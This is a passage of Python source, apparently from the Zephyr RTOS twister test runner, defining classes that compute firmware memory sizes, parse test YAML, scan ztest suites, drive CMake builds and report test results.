print(str(e)) sys.exit(2) # Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK. # GREP can not be used as it returns an error if the symbol is not # found. is_xip_command = "nm " + filename + \ " | awk '/CONFIG_XIP/ { print $3 }'" is_xip_output = subprocess.check_output( is_xip_command, shell=True, stderr=subprocess.STDOUT).decode( "utf-8").strip() try: if is_xip_output.endswith("no symbols"): raise TwisterRuntimeError("%s has no symbol information" % filename) except Exception as e: print(str(e)) sys.exit(2) self.is_xip = (len(is_xip_output) != 0) self.filename = filename self.sections = [] self.rom_size = 0 self.ram_size = 0 self.extra_sections = extra_sections self._calculate_sizes() def get_ram_size(self): """Get the amount of RAM the application will use up on the device @return amount of RAM, in bytes """ return self.ram_size def get_rom_size(self): """Get the size of the data that this application uses on device's flash @return amount of ROM, in bytes """ return self.rom_size def unrecognized_sections(self): """Get a list of sections inside the binary that weren't recognized @return list of unrecognized section names """ slist = [] for v in self.sections: if not v["recognized"]: slist.append(v["name"]) return slist def _calculate_sizes(self): """ Calculate RAM and ROM usage by section """ objdump_command = "objdump -h " + self.filename objdump_output = subprocess.check_output( objdump_command, shell=True).decode("utf-8").splitlines() for line in objdump_output: words = line.split() if not words: # Skip lines that are too short continue index = words[0] if not index[0].isdigit(): # Skip lines that do not start continue # with a digit name = words[1] # Skip lines with section names if name[0] == '.': # starting with '.' continue # TODO this doesn't actually reflect the size in flash or RAM as # it doesn't include linker-imposed padding between sections. # It is close though. size = int(words[2], 16) if size == 0: continue load_addr = int(words[4], 16) virt_addr = int(words[3], 16) # Add section to memory use totals (for both non-XIP and XIP scenarios) # Unrecognized section names are not included in the calculations. recognized = True if name in SizeCalculator.alloc_sections: self.ram_size += size stype = "alloc" elif name in SizeCalculator.rw_sections: self.ram_size += size self.rom_size += size stype = "rw" elif name in SizeCalculator.ro_sections: self.rom_size += size if not self.is_xip: self.ram_size += size stype = "ro" else: stype = "unknown" if name not in self.extra_sections: recognized = False self.sections.append({"name": name, "load_addr": load_addr, "size": size, "virt_addr": virt_addr, "type": stype, "recognized": recognized}) class TwisterConfigParser: """Class to read test case files with semantic checking """ def __init__(self, filename, schema): """Instantiate a new TwisterConfigParser object @param filename Source .yaml file to read """ self.data = {} self.schema = schema self.filename = filename self.tests = {} self.common = {} def load(self): self.data = scl.yaml_load_verify(self.filename, self.schema) if 'tests' in self.data: self.tests = self.data['tests'] if 'common' in self.data: self.common = self.data['common'] def _cast_value(self, value, typestr): if isinstance(value, str): v = value.strip() if typestr == "str": return v elif typestr == "float": return float(value) elif typestr == "int": return int(value) elif typestr == "bool": return value elif typestr.startswith("list") and isinstance(value, list): return value elif typestr.startswith("list") and isinstance(value, str): vs = v.split() if len(typestr) > 4 and typestr[4] == ":": return [self._cast_value(vsi, typestr[5:]) for vsi in vs] else: return vs elif typestr.startswith("set"): vs = v.split() if len(typestr) > 3 and typestr[3] == ":": return {self._cast_value(vsi, typestr[4:]) for vsi in vs} else: return set(vs) elif typestr.startswith("map"): return value else: raise ConfigurationError( self.filename, "unknown type '%s'" % value) def get_test(self, name, valid_keys): """Get a dictionary representing the keys/values within a test @param name The test in the .yaml file to retrieve data from @param valid_keys A dictionary representing the intended semantics for this test. Each key in this dictionary is a key that could be specified, if a key is given in the .yaml file which isn't in here, it will generate an error. Each value in this dictionary is another dictionary containing metadata: "default" - Default value if not given "type" - Data type to convert the text value to. Simple types supported are "str", "float", "int", "bool" which will get converted to respective Python data types. "set" and "list" may also be specified which will split the value by whitespace (but keep the elements as strings). finally, "list:<type>" and "set:<type>" may be given which will perform a type conversion after splitting the value up. "required" - If true, raise an error if not defined. If false and "default" isn't specified, a type conversion will be done on an empty string @return A dictionary containing the test key-value pairs with type conversion and default values filled in per valid_keys """ d = {} for k, v in self.common.items(): d[k] = v for k, v in self.tests[name].items(): if k in d: if isinstance(d[k], str): # By default, we just concatenate string values of keys # which appear both in "common" and per-test sections, # but some keys are handled in adhoc way based on their # semantics. if k == "filter": d[k] = "(%s) and (%s)" % (d[k], v) else: d[k] += " " + v else: d[k] = v for k, kinfo in valid_keys.items(): if k not in d: if "required" in kinfo: required = kinfo["required"] else: required = False if required: raise ConfigurationError( self.filename, "missing required value for '%s' in test '%s'" % (k, name)) else: if "default" in kinfo: default = kinfo["default"] else: default = self._cast_value("", kinfo["type"]) d[k] = default else: try: d[k] = self._cast_value(d[k], kinfo["type"]) except ValueError: raise ConfigurationError( self.filename, "bad %s value '%s' for key '%s' in name '%s'" % (kinfo["type"], d[k], k, name)) return d class Platform: """Class representing metadata for a particular platform Maps directly to BOARD when building""" platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "platform-schema.yaml")) def __init__(self): """Constructor. """ self.name = "" self.twister = True # if no RAM size is specified by the board, take a default of 128K self.ram = 128 self.ignore_tags = [] self.only_tags = [] self.default = False # if no flash size is specified by the board, take a default of 512K self.flash = 512 self.supported = set() self.arch = "" self.type = "na" self.simulation = "na" self.supported_toolchains = [] self.env = [] self.env_satisfied = True self.filter_data = dict() def load(self, platform_file): scp = TwisterConfigParser(platform_file, self.platform_schema) scp.load() data = scp.data self.name = data['identifier'] self.twister = data.get("twister", True) # if no RAM size is specified by the board, take a default of 128K self.ram = data.get("ram", 128) testing = data.get("testing", {}) self.ignore_tags = testing.get("ignore_tags", []) self.only_tags = testing.get("only_tags", []) self.default = testing.get("default", False) # if no flash size is specified by the board, take a default of 512K self.flash = data.get("flash", 512) self.supported = set() for supp_feature in data.get("supported", []): for item in supp_feature.split(":"): self.supported.add(item) self.arch = data['arch'] self.type = data.get('type', "na") self.simulation = data.get('simulation', "na") self.supported_toolchains = data.get("toolchain", []) self.env = data.get("env", []) self.env_satisfied = True for env in self.env: if not os.environ.get(env, None): self.env_satisfied = False def __repr__(self): return "<%s on %s>" % (self.name, self.arch) class DisablePyTestCollectionMixin(object): __test__ = False class ScanPathResult: """Result of the TestCase.scan_path function call. Attributes: matches A list of test cases warnings A string containing one or more warnings to display has_registered_test_suites Whether or not the path contained any calls to the ztest_register_test_suite macro. has_run_registered_test_suites Whether or not the path contained at least one call to ztest_run_registered_test_suites. has_test_main Whether or not the path contains a definition of test_main(void) """ def __init__(self, matches: List[str] = None, warnings: str = None, has_registered_test_suites: bool = False, has_run_registered_test_suites: bool = False, has_test_main: bool = False): self.matches = matches self.warnings = warnings self.has_registered_test_suites = has_registered_test_suites self.has_run_registered_test_suites = has_run_registered_test_suites self.has_test_main = has_test_main def __eq__(self, other): if not isinstance(other, ScanPathResult): return False return (sorted(self.matches) == sorted(other.matches) and self.warnings == other.warnings and (self.has_registered_test_suites == other.has_registered_test_suites) and (self.has_run_registered_test_suites == other.has_run_registered_test_suites) and self.has_test_main == other.has_test_main) class TestCase(DisablePyTestCollectionMixin): """Class representing a test application """ def __init__(self, testcase_root, workdir, name): """TestCase constructor. This gets called by TestSuite as it finds and reads test yaml files. Multiple TestCase instances may be generated from a single testcase.yaml, each one corresponds to an entry within that file. We need to have a unique name for every single test case. Since a testcase.yaml can define multiple tests, the canonical name for the test case is <workdir>/<name>. @param testcase_root os.path.abspath() of one of the --testcase-root @param workdir Sub-directory of testcase_root where the .yaml test configuration file was found @param name Name of this test case, corresponding to the entry name in the test case configuration file. For many test cases that just define one test, can be anything and is usually "test". This is really only used to distinguish between different cases when the testcase.yaml defines multiple tests """ self.source_dir = "" self.yamlfile = "" self.cases = [] self.name = self.get_unique(testcase_root, workdir, name) self.id = name self.type = None self.tags = set() self.extra_args = None self.extra_configs = None self.arch_allow = None self.arch_exclude = None self.skip = False self.platform_exclude = None self.platform_allow = None self.toolchain_exclude = None self.toolchain_allow = None self.tc_filter = None self.timeout = 60 self.harness = "" self.harness_config = {} self.build_only = True self.build_on_all = False self.slow = False self.min_ram = -1 self.depends_on = None self.min_flash = -1 self.extra_sections = None self.integration_platforms = [] @staticmethod def get_unique(testcase_root, workdir, name): canonical_testcase_root = os.path.realpath(testcase_root) if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents: # This is in ZEPHYR_BASE, so include path in name for uniqueness # FIXME: We should not depend on path of test for unique names. relative_tc_root = os.path.relpath(canonical_testcase_root, start=canonical_zephyr_base) else: relative_tc_root = "" # workdir can be "." unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name)) check = name.split(".") if len(check) < 2: raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \ Tests should reference the category and subsystem with a dot as a separator. """ ) return unique @staticmethod def scan_file(inf_name): suite_regex = re.compile( # do not match until end-of-line, otherwise we won't allow # stc_regex below to catch the ones that are declared in the same # line--as we only search starting the end of this match br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,", re.MULTILINE) registered_suite_regex = re.compile( br"^\s*ztest_register_test_suite" br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,", re.MULTILINE) # Checks if the file contains a definition of "void test_main(void)" # Since ztest provides a plain test_main implementation it is OK to: # 1. register test suites and not call the run function iff the test # doesn't have a custom test_main. # 2. register test suites and a custom test_main definition iff the test # also calls ztest_run_registered_test_suites. test_main_regex = re.compile( br"^\s*void\s+test_main\(void\)", re.MULTILINE) stc_regex = re.compile( br"""^\s* # empy space at the beginning is ok # catch the case where it is declared in the same sentence, e.g: # # ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME)); # ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME), (?:ztest_ (?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*) [a-zA-Z0-9_]+\s*,\s* )? # Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME) ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)? # Consume the argument that becomes the extra testcse \(\s*(?P<stc_name>[a-zA-Z0-9_]+) # _setup_teardown() variant has two extra arguments that we ignore (?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)? \s*\)""", # We don't check how it finishes; we don't care re.MULTILINE | re.VERBOSE) suite_run_regex = re.compile( br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)", re.MULTILINE) registered_suite_run_regex = re.compile( br"^\s*ztest_run_registered_test_suites\(" br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)", re.MULTILINE) achtung_regex = re.compile( br"(#ifdef|#endif)", re.MULTILINE) warnings = None has_registered_test_suites = False has_run_registered_test_suites = False has_test_main = False with open(inf_name) as inf: if os.name == 'nt': mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ} else: mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ, 'offset': 0} with contextlib.closing(mmap.mmap(**mmap_args)) as main_c: suite_regex_match = suite_regex.search(main_c) registered_suite_regex_match = registered_suite_regex.search( main_c) if registered_suite_regex_match: has_registered_test_suites = True if registered_suite_run_regex.search(main_c): has_run_registered_test_suites = True if test_main_regex.search(main_c): has_test_main = True if not suite_regex_match and not has_registered_test_suites: # can't find ztest_test_suite, maybe a client, because # it includes ztest.h return ScanPathResult( matches=None, warnings=None, has_registered_test_suites=has_registered_test_suites, has_run_registered_test_suites=has_run_registered_test_suites, has_test_main=has_test_main) suite_run_match = suite_run_regex.search(main_c) if suite_regex_match and not suite_run_match: raise ValueError("can't find ztest_run_test_suite") if suite_regex_match: search_start = suite_regex_match.end() else: search_start = registered_suite_regex_match.end() if suite_run_match: search_end = suite_run_match.start() else: search_end = re.compile(br"\);", re.MULTILINE) \ .search(main_c, search_start) \ .end() achtung_matches = re.findall( achtung_regex, main_c[search_start:search_end]) if achtung_matches: warnings = "found invalid %s in ztest_test_suite()" \ % ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True)) _matches = re.findall( stc_regex, main_c[search_start:search_end]) for match in _matches: if not match.decode().startswith("test_"): warnings = "Found a test that does not start with test_" matches = [match.decode().replace("test_", "", 1) for match in _matches] return ScanPathResult( matches=matches, warnings=warnings, has_registered_test_suites=has_registered_test_suites, has_run_registered_test_suites=has_run_registered_test_suites, has_test_main=has_test_main) def scan_path(self, path): subcases = [] has_registered_test_suites = False has_run_registered_test_suites = False has_test_main = False for filename in glob.glob(os.path.join(path, "src", "*.c*")): try: result: ScanPathResult = self.scan_file(filename) if result.warnings: logger.error("%s: %s" % (filename, result.warnings)) raise TwisterRuntimeError( "%s: %s" % (filename, result.warnings)) if result.matches: subcases += result.matches if result.has_registered_test_suites: has_registered_test_suites = True if result.has_run_registered_test_suites: has_run_registered_test_suites = True if result.has_test_main: has_test_main = True except ValueError as e: logger.error("%s: can't find: %s" % (filename, e)) for filename in glob.glob(os.path.join(path, "*.c")): try: result: ScanPathResult = self.scan_file(filename) if result.warnings: logger.error("%s: %s" % (filename, result.warnings)) if result.matches: subcases += result.matches except ValueError as e: logger.error("%s: can't find: %s" % (filename, e)) if (has_registered_test_suites and has_test_main and not has_run_registered_test_suites): warning = \ "Found call to 'ztest_register_test_suite()' but no "\ "call to 'ztest_run_registered_test_suites()'" logger.error(warning) raise TwisterRuntimeError(warning) return subcases def parse_subcases(self, test_path): results = self.scan_path(test_path) for sub in results: name = "{}.{}".format(self.id, sub) self.cases.append(name) if not results: self.cases.append(self.id) def __str__(self): return self.name class TestInstance(DisablePyTestCollectionMixin): """Class representing the execution of a particular TestCase on a platform @param test The TestCase object we want to build/execute @param platform Platform object that we want to build and run against @param base_outdir Base directory for all test results. The actual out directory used is <outdir>/<platform>/<test case name> """ def __init__(self, testcase, platform, outdir): self.testcase = testcase self.platform = platform self.status = None self.reason = "Unknown" self.metrics = dict() self.handler = None self.outdir = outdir self.name = os.path.join(platform.name, testcase.name) self.build_dir = os.path.join(outdir, platform.name, testcase.name) self.run = False self.results = {} def __getstate__(self): d = self.__dict__.copy() return d def __setstate__(self, d): self.__dict__.update(d) def __lt__(self, other): return self.name < other.name @staticmethod def testcase_runnable(testcase, fixtures): can_run = False # console harness allows us to run the test and capture data. if testcase.harness in [ 'console', 'ztest', 'pytest']: can_run = True # if we have a fixture that is also being supplied on the # command-line, then we need to run the test, not just build it. fixture = testcase.harness_config.get('fixture') if fixture: can_run = (fixture in fixtures) elif testcase.harness: can_run = False else: can_run = True return can_run # Global testsuite parameters def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]): # right now we only support building on windows. running is still work # in progress. if os.name == 'nt': return False # we asked for build-only on the command line if self.testcase.build_only: return False # Do not run slow tests: skip_slow = self.testcase.slow and not enable_slow if skip_slow: return False target_ready = bool(self.testcase.type == "unit" or \ self.platform.type == "native" or \ self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp"] or \ filter == 'runnable') if self.platform.simulation == "nsim": if not find_executable("nsimdrv"): target_ready = False if self.platform.simulation == "mdb-nsim": if not find_executable("mdb"): target_ready = False if self.platform.simulation == "renode": if not find_executable("renode"): target_ready = False if self.platform.simulation == "tsim": if not find_executable("tsim-leon3"): target_ready = False testcase_runnable = self.testcase_runnable(self.testcase, fixtures) return testcase_runnable and target_ready def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]): # Create this in a "twister/" subdirectory otherwise this # will pass this overlay to kconfig.py *twice* and kconfig.cmake # will silently give that second time precedence over any # --extra-args=CONFIG_* subdir = os.path.join(self.build_dir, "twister") content = "" if self.testcase.extra_configs: content = "\n".join(self.testcase.extra_configs) if enable_coverage: if platform.name in coverage_platform: content = content + "\nCONFIG_COVERAGE=y" content = content + "\nCONFIG_COVERAGE_DUMP=y" if enable_asan: if platform.type == "native": content = content + "\nCONFIG_ASAN=y" if enable_ubsan: if platform.type == "native": content = content + "\nCONFIG_UBSAN=y" if content: os.makedirs(subdir, exist_ok=True) file = os.path.join(subdir, "testcase_extra.conf") with open(file, "w") as f: f.write(content) return content def calculate_sizes(self): """Get the RAM/ROM sizes of a test case. This can only be run after the instance has been executed by MakeGenerator, otherwise there won't be any binaries to measure. @return A SizeCalculator object """ fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf")) fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe"))) fns = [x for x in fns if not x.endswith('_prebuilt.elf')] if len(fns) != 1: raise BuildError("Missing/multiple output ELF binary") return SizeCalculator(fns[0], self.testcase.extra_sections) def fill_results_by_status(self): """Fills results according to self.status The method is used to propagate the instance level status to the test cases inside. Useful when the whole instance is skipped and the info is required also at the test cases level for reporting. Should be used with caution, e.g. should not be used to fill all results with passes """ status_to_verdict = { 'skipped': 'SKIP', 'error': 'BLOCK', 'failure': 'FAILED' } for k in self.results: self.results[k] = status_to_verdict[self.status] def __repr__(self): return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name) class CMake(): config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$') dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$') def __init__(self, testcase, platform, source_dir, build_dir): self.cwd = None self.capture_output = True self.defconfig = {} self.cmake_cache = {} self.instance = None self.testcase = testcase self.platform = platform self.source_dir = source_dir self.build_dir = build_dir self.log = "build.log" self.generator = None self.generator_cmd = None def parse_generated(self): self.defconfig = {} return {} def run_build(self, args=[]): logger.debug("Building %s for %s" % (self.source_dir, self.platform.name)) cmake_args = [] cmake_args.extend(args) cmake = shutil.which('cmake') cmd = [cmake] + cmake_args kwargs = dict() if self.capture_output: kwargs['stdout'] = subprocess.PIPE # CMake sends the output of message() to stderr unless it's STATUS kwargs['stderr'] = subprocess.STDOUT if self.cwd: kwargs['cwd'] = self.cwd p = subprocess.Popen(cmd, **kwargs) out, _ = p.communicate() results = {} if p.returncode == 0: msg = "Finished building %s for %s" % (self.source_dir, self.platform.name) self.instance.status = "passed" results = {'msg': msg, "returncode": p.returncode, "instance": self.instance} if out: log_msg = out.decode(sys.getdefaultencoding()) with open(os.path.join(self.build_dir, self.log), "a") as log: log.write(log_msg) else: return None else: # A real error occurred, raise an exception log_msg = "" if out: log_msg = out.decode(sys.getdefaultencoding()) with open(os.path.join(self.build_dir, self.log), "a") as log: log.write(log_msg) if log_msg: res = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg) if res and not self.overflow_as_errors: logger.debug("Test skipped due to {} Overflow".format(res[0])) self.instance.status = "skipped" self.instance.reason = "{} overflow".format(res[0]) else: self.instance.status = "error" self.instance.reason = "Build failure" results = { "returncode": p.returncode, "instance": self.instance, } return results def run_cmake(self, args=[]): if self.warnings_as_errors: ldflags = "-Wl,--fatal-warnings" cflags = "-Werror" aflags = "-Wa,--fatal-warnings" gen_defines_args = "--edtlib-Werror" else: ldflags = cflags = aflags = "" gen_defines_args = "" logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name)) cmake_args = [ f'-B{self.build_dir}', f'-S{self.source_dir}', f'-DEXTRA_CFLAGS="{cflags}"', f'-DEXTRA_AFLAGS="{aflags}', f'-DEXTRA_LDFLAGS="{ldflags}"', f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}', f'-G{self.generator}' ] args = ["-D{}".format(a.replace('"', '')) for a in args] cmake_args.extend(args) cmake_opts = ['-DBOARD={}'.format(self.platform.name)] cmake_args.extend(cmake_opts) logger.debug("Calling cmake with arguments: {}".format(cmake_args)) cmake = shutil.which('cmake') cmd = [cmake] + cmake_args kwargs = dict() if self.capture_output: kwargs['stdout'] = subprocess.PIPE # CMake sends the output of message() to stderr unless it's STATUS kwargs['stderr'] = subprocess.STDOUT if self.cwd: kwargs['cwd'] = self.cwd p = subprocess.Popen(cmd, **kwargs) out, _ = p.communicate() if p.returncode == 0: filter_results = self.parse_generated() msg = "Finished building %s for %s" % (self.source_dir, self.platform.name) logger.debug(msg) results = {'msg': msg, 'filter': filter_results} else: self.instance.status = "error" self.instance.reason = "Cmake build failure" self.instance.fill_results_by_status() logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name)) results = {"returncode": p.returncode} if out: with open(os.path.join(self.build_dir, self.log), "a") as log: log_msg = out.decode(sys.getdefaultencoding()) log.write(log_msg) return results @staticmethod def run_cmake_script(args=[]): logger.debug("Running cmake script %s" % (args[0])) cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]] cmake_args.extend(['-P', args[0]]) logger.debug("Calling cmake with arguments: {}".format(cmake_args)) cmake = shutil.which('cmake') if not cmake: msg = "Unable to find `cmake` in path" logger.error(msg) raise Exception(msg) cmd = [cmake] + cmake_args kwargs = dict() kwargs['stdout'] = subprocess.PIPE # CMake sends the output of message() to stderr unless it's STATUS kwargs['stderr'] = subprocess.STDOUT p = subprocess.Popen(cmd, **kwargs) out, _ = p.communicate() # It might happen that the environment adds ANSI escape codes like \x1b[0m, # for instance if twister is executed from inside a makefile. In such a # scenario it is then necessary to remove them, as otherwise the JSON decoding # will fail. ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])') out = ansi_escape.sub('', out.decode()) if p.returncode == 0: msg = "Finished running %s" % (args[0]) logger.debug(msg) results = {"returncode": p.returncode, "msg": msg, "stdout": out} else: logger.error("Cmake script failure: %s" % (args[0])) results = {"returncode": p.returncode, "returnmsg": out} return results class FilterBuilder(CMake): def __init__(self, testcase, platform, source_dir, build_dir): super().__init__(testcase, platform, source_dir, build_dir) self.log = "config-twister.log" def parse_generated(self): if self.platform.name == "unit_testing": return {} cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt") defconfig_path = os.path.join(self.build_dir, "zephyr", ".config") with open(defconfig_path, "r") as fp: defconfig = {} for line in fp.readlines(): m = self.config_re.match(line) if not m: if line.strip() and not line.startswith("#"): sys.stderr.write("Unrecognized line %s\n" % line) continue defconfig[m.group(1)] = m.group(2).strip() self.defconfig = defconfig cmake_conf = {} try: cache = CMakeCache.from_file(cmake_cache_path) except FileNotFoundError: cache = {} for k in iter(cache): cmake_conf[k.name] = k.value self.cmake_cache = cmake_conf filter_data = { "ARCH": self.platform.arch, "PLATFORM": self.platform.name } filter_data.update(os.environ) filter_data.update(self.defconfig) filter_data.update(self.cmake_cache) edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle") if self.testcase and self.testcase.tc_filter: try: if os.path.exists(edt_pickle): with open(edt_pickle, 'rb') as f: edt = pickle.load(f) else: edt = None res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt) except (ValueError, SyntaxError) as se: sys.stderr.write( "Failed processing %s\n" % self.testcase.yamlfile) raise se if not res: return {os.path.join(self.platform.name, self.testcase.name): True} else: return {os.path.join(self.platform.name, self.testcase.name): False} else: self.platform.filter_data = filter_data return filter_data class ProjectBuilder(FilterBuilder): def __init__(self, suite, instance, **kwargs): super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir) self.log = "build.log" self.instance = instance self.suite = suite self.filtered_tests = 0 self.lsan = kwargs.get('lsan', False) self.asan = kwargs.get('asan', False) self.ubsan = kwargs.get('ubsan', False) self.valgrind = kwargs.get('valgrind', False) self.extra_args = kwargs.get('extra_args', []) self.device_testing = kwargs.get('device_testing', False) self.cmake_only = kwargs.get('cmake_only', False) self.cleanup = kwargs.get('cleanup', False) self.coverage = kwargs.get('coverage', False) self.inline_logs = kwargs.get('inline_logs', False) self.generator = kwargs.get('generator', None) self.generator_cmd = kwargs.get('generator_cmd', None) self.verbose = kwargs.get('verbose', None) self.warnings_as_errors = kwargs.get('warnings_as_errors', True) self.overflow_as_errors = kwargs.get('overflow_as_errors', False) @staticmethod def log_info(filename, inline_logs): filename = os.path.abspath(os.path.realpath(filename)) if inline_logs: logger.info("{:-^100}".format(filename)) try: with open(filename) as fp: data = fp.read() except Exception as e: data = "Unable to read log data (%s)\n" % (str(e)) logger.error(data) logger.info("{:-^100}".format(filename)) else: logger.error("see: " + Fore.YELLOW + filename + Fore.RESET) def log_info_file(self, inline_logs): build_dir = self.instance.build_dir h_log = "{}/handler.log".format(build_dir) b_log = "{}/build.log".format(build_dir) v_log = "{}/valgrind.log".format(build_dir) d_log = "{}/device.log".format(build_dir) if os.path.exists(v_log) and "Valgrind" in self.instance.reason: self.log_info("{}".format(v_log), inline_logs) elif os.path.exists(h_log) and os.path.getsize(h_log) > 0: self.log_info("{}".format(h_log), inline_logs) elif os.path.exists(d_log) and os.path.getsize(d_log) > 0: self.log_info("{}".format(d_log), inline_logs) else: self.log_info("{}".format(b_log), inline_logs) def setup_handler(self): instance = self.instance args = [] # FIXME: Needs simplification if instance.platform.simulation == "qemu": instance.handler = QEMUHandler(instance, "qemu") args.append("QEMU_PIPE=%s" % instance.handler.get_fifo()) instance.handler.call_make_run = True elif instance.testcase.type == "unit": instance.handler = BinaryHandler(instance, "unit") instance.handler.binary = os.path.join(instance.build_dir, "testbinary") if self.coverage: args.append("COVERAGE=1") elif instance.platform.type == "native": handler = BinaryHandler(instance, "native") handler.asan = self.asan handler.valgrind = self.valgrind handler.lsan = self.lsan handler.ubsan = self.ubsan handler.coverage = self.coverage handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe") instance.handler = handler elif instance.platform.simulation == "renode": if find_executable("renode"): instance.handler = BinaryHandler(instance, "renode") instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid") instance.handler.call_make_run = True elif instance.platform.simulation == "tsim": instance.handler = BinaryHandler(instance, "tsim") instance.handler.call_make_run = True elif self.device_testing: instance.handler = DeviceHandler(instance, "device") instance.handler.coverage = self.coverage elif instance.platform.simulation == "nsim": if find_executable("nsimdrv"): instance.handler = BinaryHandler(instance, "nsim") instance.handler.call_make_run = True elif instance.platform.simulation == "mdb-nsim": if find_executable("mdb"): instance.handler = BinaryHandler(instance, "nsim") instance.handler.call_make_run = True elif instance.platform.simulation == "armfvp": instance.handler = BinaryHandler(instance, "armfvp") instance.handler.call_make_run = True if instance.handler: instance.handler.args = args instance.handler.generator_cmd = self.generator_cmd instance.handler.generator = self.generator def process(self, pipeline, done, message, lock, results): op = message.get('op') if not self.instance.handler: self.setup_handler() # The build process, call cmake and build with configured generator if op == "cmake": res = self.cmake() if self.instance.status in ["failed", "error"]: pipeline.put({"op": "report", "test": self.instance}) elif self.cmake_only: if self.instance.status is None: self.instance.status = "passed" pipeline.put({"op": "report", "test": self.instance}) else: if self.instance.name in res['filter'] and res['filter'][self.instance.name]: logger.debug("filtering %s" % self.instance.name) self.instance.status = "skipped" self.instance.reason = "filter" results.skipped_runtime += 1 for case in self.instance.testcase.cases: self.instance.results.update({case: 'SKIP'}) pipeline.put({"op": "report", "test": self.instance}) else: pipeline.put({"op": "build", "test": self.instance}) elif op == "build": logger.debug("build test: %s" % self.instance.name) res = self.build() if not res: self.instance.status = "error" self.instance.reason = "Build Failure" pipeline.put({"op": "report", "test": self.instance}) else: # Count skipped cases during build, for example # due to ram/rom overflow. inst = res.get("instance", None) if inst and inst.status == "skipped": results.skipped_runtime += 1 if res.get('returncode', 1) > 0: pipeline.put({"op": "report", "test": self.instance}) else: if self.instance.run and self.instance.handler: pipeline.put({"op": "run", "test": self.instance}) else: pipeline.put({"op": "report", "test": self.instance}) # Run the generated binary using one of the supported handlers elif op == "run": logger.debug("run test: %s" % self.instance.name) self.run() self.instance.status, _ = self.instance.handler.get_state() logger.debug(f"run status: {self.instance.name} {self.instance.status}") # to make it work with pickle self.instance.handler.thread = None self.instance.handler.suite = None pipeline.put({ "op": "report", "test": self.instance, "status": self.instance.status, "reason": self.instance.reason } ) # Report results and output progress to screen elif op == "report": with lock: done.put(self.instance) self.report_out(results) if self.cleanup and not self.coverage and self.instance.status == "passed": pipeline.put({ "op": "cleanup", "test": self.instance }) elif op == "cleanup": if self.device_testing: self.cleanup_device_testing_artifacts() else: self.cleanup_artifacts() def cleanup_artifacts(self, additional_keep=[]): logger.debug("Cleaning up {}".format(self.instance.build_dir)) allow = [ 'zephyr/.config', 'handler.log', 'build.log', 'device.log', 'recording.csv', ] allow += additional_keep allow = [os.path.join(self.instance.build_dir, file) for file in allow] for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False): for name in filenames: path = os.path.join(dirpath, name) if path not in allow: os.remove(path) # Remove empty directories and symbolic links to directories for dir in dirnames: path = os.path.join(dirpath, dir) if os.path.islink(path): os.remove(path) elif not os.listdir(path): os.rmdir(path) def cleanup_device_testing_artifacts(self): logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir)) sanitizelist = [ 'CMakeCache.txt', 'zephyr/runners.yaml', ] keep = [ 'zephyr/zephyr.hex', 'zephyr/zephyr.bin', 'zephyr/zephyr.elf', ] keep += sanitizelist self.cleanup_artifacts(keep) # sanitize paths so files are relocatable for file in sanitizelist: file = os.path.join(self.instance.build_dir, file) with open(file, "rt") as fin: data = fin.read() data = data.replace(canonical_zephyr_base+"/", "") with open(file, "wt") as fin: fin.write(data) def report_out(self, results): total_to_do = results.total - results.skipped_configs total_tests_width = len(str(total_to_do)) results.done += 1 instance = self.instance if instance.status in ["error", "failed", "timeout", "flash_error"]: if instance.status == "error": results.error += 1 results.failed += 1 if self.verbose: status = Fore.RED + "FAILED " + Fore.RESET + instance.reason else: print("") logger.error( "{:<25} {:<50} {}FAILED{}: {}".format( instance.platform.name, instance.testcase.name, Fore.RED, Fore.RESET, instance.reason)) if not self.verbose: self.log_info_file(self.inline_logs) elif instance.status == "skipped": status = Fore.YELLOW + "SKIPPED" + Fore.RESET elif instance.status == "passed": status = Fore.GREEN + "PASSED" + Fore.RESET else: logger.debug(f"Unknown status = {instance.status}") status = Fore.YELLOW + "UNKNOWN" + Fore.RESET if self.verbose: if self.cmake_only: more_info = "cmake" elif instance.status == "skipped": more_info = instance.reason else: if instance.handler and 